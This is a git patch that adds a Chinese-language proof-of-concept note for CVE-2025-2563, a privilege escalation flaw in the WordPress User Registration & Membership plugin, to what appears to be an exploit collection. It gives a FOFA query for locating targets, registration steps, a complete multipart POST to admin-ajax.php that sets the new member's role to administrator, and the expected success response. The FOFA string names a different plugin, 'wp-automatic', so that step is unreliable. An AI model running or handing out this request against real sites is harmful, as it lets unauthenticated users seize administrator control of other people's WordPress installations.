From c66951cd44aed469fcbe5ffd11b9e3da46d8a626 Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 7 Apr 2025 10:52:06 +0800
Subject: [PATCH] =?UTF-8?q?Update=20WordPress=20(User=20Registration=20&?= =?UTF-8?q?=20Membership)=20Plugin=E6=9D=83=E9=99=90=E6=8F=90=E5=8D=87?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2025-2563).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ship) Plugin权限提升漏洞(CVE-2025-2563).md | 44 +++++++++++++++++++
1 file changed, 44 insertions(+)
diff --git a/wpoc/WordPress/WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md b/wpoc/WordPress/WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md
index 8b13789..f18d386 100644
--- a/wpoc/WordPress/WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md
+++ b/wpoc/WordPress/WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563).md
@@ -1 +1,45 @@
+## WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563)
+## fofa
+```
+"/wp-content/plugins/wp-automatic"
+```
+## 第一步
+通过 /registration 或 /membership-registration 前端页面注册
+## 第二步,注册后,使用该请求数据
+```
+POST /wp-admin/admin-ajax.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
+Accept: */*
+Host: hackthebox.test
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
+
+----------------------------189123966817005614765335
+Content-Disposition: form-data; name="action"
+
+user_registration_membership_register_member
+----------------------------189123966817005614765335
+Content-Disposition: form-data; name="security"
+
+THE_NONCE_HERE
+----------------------------189123966817005614765335
+Content-Disposition: form-data; name="members_data"
+
+{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
+----------------------------189123966817005614765335--
+```
+## 第三步,返回相应包如下
+```
+{
+ "success": true,
+ "data": {
+ "member_id": 24,
+ "transaction_id": "",
+ "message": "New member has been successfully created."
+ }
+}
+```
+## github地址
+https://github.com/ubaydev/CVE-2025-2563